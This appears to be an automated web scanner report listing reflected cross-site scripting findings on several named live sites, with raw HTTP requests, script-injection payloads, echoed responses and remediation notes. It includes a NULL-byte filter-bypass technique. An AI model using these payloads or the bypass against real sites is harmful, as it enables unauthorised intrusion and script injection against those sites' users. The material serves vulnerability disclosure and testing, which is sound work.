Request
GET /cssc8ea7<script>alert(1)</script>7d0af9d8db0/global.css HTTP/1.1 Host: goop.com Proxy-Connection: keep-alive Referer: http://goop.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:11:05 GMT Server: Apache Served-By: Joyent Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 513
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00a0a49<script>alert(1)</script>b01993571b7 was submitted in the REST URL parameter 2. This input was echoed as a0a49<script>alert(1)</script>b01993571b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /css/global.css%00a0a49<script>alert(1)</script>b01993571b7 HTTP/1.1 Host: goop.com Proxy-Connection: keep-alive Referer: http://goop.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:11:38 GMT Server: Apache Served-By: Joyent Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 516
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00e6684<script>alert(1)</script>43a55766fd0 was submitted in the REST URL parameter 1. This input was echoed as e6684<script>alert(1)</script>43a55766fd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /favicon.ico%00e6684<script>alert(1)</script>43a55766fd0 HTTP/1.1 Host: goop.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000; __utmz=108318356.1296508226.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108318356.340624538.1296508226.1296508226.1296508226.1; __utmc=108318356; __utmb=108318356.1.10.1296508226
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:11:43 GMT Server: Apache Served-By: Joyent Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 513
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 810d7<script>alert(1)</script>33ccebc9f2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js810d7<script>alert(1)</script>33ccebc9f2e/AC_RunActiveContent.js HTTP/1.1 Host: goop.com Proxy-Connection: keep-alive Referer: http://goop.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:11:04 GMT Server: Apache Served-By: Joyent Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 524
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00b45ab<script>alert(1)</script>a4768d1993d was submitted in the REST URL parameter 2. This input was echoed as b45ab<script>alert(1)</script>a4768d1993d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /js/AC_RunActiveContent.js%00b45ab<script>alert(1)</script>a4768d1993d HTTP/1.1 Host: goop.com Proxy-Connection: keep-alive Referer: http://goop.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:11:28 GMT Server: Apache Served-By: Joyent Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 527
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7204"%3balert(1)//5086f535233 was submitted in the mpck parameter. This input was echoed as a7204";alert(1)//5086f535233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-34880-0%3Fmpt%3D7163398a7204"%3balert(1)//5086f535233&mpt=7163398&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3aa0/3/0/%2a/e%3B235326809%3B0-0%3B1%3B37997683%3B3454-728/90%3B40413144/40430931/1%3B%3B%7Esscs%3D%3f HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=15017:34880/9609:2042/11606:17922/14302:28901/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:47 GMT Server: Apache Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT ETag: "43e67e-bfe-49a4c7ee56f00" Accept-Ranges: bytes Content-Length: 5698 Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd4e"%3balert(1)//d8d83967ba2 was submitted in the mpvc parameter. This input was echoed as abd4e";alert(1)//d8d83967ba2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-34880-0%3Fmpt%3D7163398&mpt=7163398&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3aa0/3/0/%2a/e%3B235326809%3B0-0%3B1%3B37997683%3B3454-728/90%3B40413144/40430931/1%3B%3B%7Esscs%3D%3fabd4e"%3balert(1)//d8d83967ba2 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=15017:34880/9609:2042/11606:17922/14302:28901/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:11:49 GMT Server: Apache Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT ETag: "43e67e-bfe-49a4c7ee56f00" Accept-Ranges: bytes Content-Length: 5674 Content-Type: application/x-javascript
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3765f'><script>alert(1)</script>d66da1f0de2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comment3765f'><script>alert(1)</script>d66da1f0de2/dd5b14065e2bc9e2bfced67832069618/generic/73522711 HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:11:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/comment3765f'><script>alert(1)</script>d66da1f0de2/dd5b14065e2bc9e2bfced67832069618/generic/73522711'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d43c7'><script>alert(1)</script>b83048b6d9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /empty.phpd43c7'><script>alert(1)</script>b83048b6d9a HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:11:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4701
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.phpd43c7'><script>alert(1)</script>b83048b6d9a'> ...[SNIP]...
1.26. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intensedebate.com
Path:
/empty.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 103fc'><script>alert(1)</script>64edd2460e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /empty.php/103fc'><script>alert(1)</script>64edd2460e8 HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:11:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php/103fc'><script>alert(1)</script>64edd2460e8'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2cc27'><script>alert(1)</script>605cb6e27a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb-connect/fbConnect.php2cc27'><script>alert(1)</script>605cb6e27a0 HTTP/1.1 Host: intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:25:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/fbConnect.php2cc27'><script>alert(1)</script>605cb6e27a0'> ...[SNIP]...
1.28. http://intensedebate.com/fb-connect/fbConnect.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intensedebate.com
Path:
/fb-connect/fbConnect.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3738a'><script>alert(1)</script>b1874870dbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb-connect/fbConnect.php/3738a'><script>alert(1)</script>b1874870dbc HTTP/1.1 Host: intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:25:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/fbConnect.php/3738a'><script>alert(1)</script>b1874870dbc'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload df44a'><script>alert(1)</script>671aa9063a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb-connect/getFB.phpdf44a'><script>alert(1)</script>671aa9063a9 HTTP/1.1 Host: intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:25:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/getFB.phpdf44a'><script>alert(1)</script>671aa9063a9'> ...[SNIP]...
1.30. http://intensedebate.com/fb-connect/getFB.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intensedebate.com
Path:
/fb-connect/getFB.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d112'><script>alert(1)</script>1432c2f74b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb-connect/getFB.php/3d112'><script>alert(1)</script>1432c2f74b9 HTTP/1.1 Host: intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:25:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/getFB.php/3d112'><script>alert(1)</script>1432c2f74b9'> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81127'><script>alert(1)</script>04c9e41e5e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /idc/js/comment-func.php81127'><script>alert(1)</script>04c9e41e5e9?token=JyC7TUrDqHsAt8x9KTtYkQqi0Pk09rxT&blogpostid=73522711&time=1296491549666 HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:11:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php81127'><script>alert(1)</script>04c9e41e5e9?token=JyC7TUrDqHsAt8x9KTtYkQqi0Pk09rxT&blogpostid=73522711&time=1296491549666'> ...[SNIP]...
1.32. http://intensedebate.com/idc/js/comment-func.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intensedebate.com
Path:
/idc/js/comment-func.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6bf69'><script>alert(1)</script>a0620b0aaaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /idc/js/comment-func.php/6bf69'><script>alert(1)</script>a0620b0aaaa HTTP/1.1 Host: intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:25:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4810
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php/6bf69'><script>alert(1)</script>a0620b0aaaa'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a24a3'><script>alert(1)</script>8d493091df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/genericCommentWrapper2.phpa24a3'><script>alert(1)</script>8d493091df?acct=dd5b14065e2bc9e2bfced67832069618&postid=195310&title=Microsoft%20warns%20of%20Internet%20Explorer%20XSS%20flaw%20in%20all%20versions%20of%20Windows%20-%20SC%20Magazine%20UK&url=http%3A%2F%2Fwww.scmagazineuk.com%2Fmicrosoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows%2Farticle%2F195310%2F HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:11:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 5030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapper2.phpa24a3'><script>alert(1)</script>8d493091df?acct=dd5b14065e2bc9e2bfced67832069618&postid=195310&title=Microsoft%20warns%20of%20Internet%20Explorer%20XSS%20flaw%20in%20all%20versions%20of%20Windows%20-%20SC%20Magazine%20UK&url=http%3A%2F%2Fwww.s ...[SNIP]...
1.34. http://intensedebate.com/js/genericCommentWrapper2.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intensedebate.com
Path:
/js/genericCommentWrapper2.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b0f4'><script>alert(1)</script>82f6491ebe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/genericCommentWrapper2.php/1b0f4'><script>alert(1)</script>82f6491ebe HTTP/1.1 Host: intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:25:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4814
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapper2.php/1b0f4'><script>alert(1)</script>82f6491ebe'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26d34'><script>alert(1)</script>614bd29ba59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/getUserMenu.php26d34'><script>alert(1)</script>614bd29ba59 HTTP/1.1 Host: intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:25:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getUserMenu.php26d34'><script>alert(1)</script>614bd29ba59'> ...[SNIP]...
1.36. http://intensedebate.com/js/getUserMenu.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://intensedebate.com
Path:
/js/getUserMenu.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31bfc'><script>alert(1)</script>3a235cf8e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/getUserMenu.php/31bfc'><script>alert(1)</script>3a235cf8e91 HTTP/1.1 Host: intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:25:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4800
